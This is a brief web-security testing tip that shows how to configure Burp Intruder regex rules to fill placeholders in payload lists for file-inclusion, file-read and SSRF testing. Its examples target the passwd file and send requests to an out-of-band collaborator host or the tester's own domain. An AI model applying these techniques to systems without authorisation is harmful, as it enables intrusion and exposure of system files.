0x13 - Optimizing Payload Lists

Did you know some of the best vulnerabilities are not discovered using default payload lists?

You've probably seen payload lists that include placeholders like {𝐟𝐢𝐥𝐞} or {𝐜𝐨𝐥𝐥𝐚𝐛𝐨𝐫𝐚𝐭𝐨𝐫}

These lists work pretty well for

  • file inclusion

  • arbitrary file read

  • SSRF attacks


However they won't find any vulnerability because they require additional processing

There is no file named {𝐟𝐢𝐥𝐞} either on Linux/Windows/Mac/etc.

And you won't get a hit on your collaborator server using the {𝐜𝐨𝐥𝐥𝐚𝐛𝐨𝐫𝐚𝐭𝐨𝐫} payload

By using the Payload processing feature in Burp however, you can add a regex rule that will match and replace the placeholder with an actual value to improve your chances


How to do it

  1. Send your request to Intruder

  2. Set the injection point for you chosen parameter

  3. Load your favorite payload list

  4. Scroll down to the Payload processing and proceed to add a new regex rule


Example 1 - look for passwd file

𝐌𝐚𝐭𝐜𝐡: \{file\} 
𝐑𝐞𝐩𝐥𝐚𝐜𝐞: passwd

Example 2 - listen for requests on collaborator

𝐌𝐚𝐭𝐜𝐡: \{collaborator\}
𝐑𝐞𝐩𝐥𝐚𝐜𝐞: ppi1cty6kllsnobn70ljb5g4bvhm5ct1.oastify.com

Example 3 - redirect to own domain

𝐌𝐚𝐭𝐜𝐡: \{collaborator\}
𝐑𝐞𝐩𝐥𝐚𝐜𝐞: yourdomain.com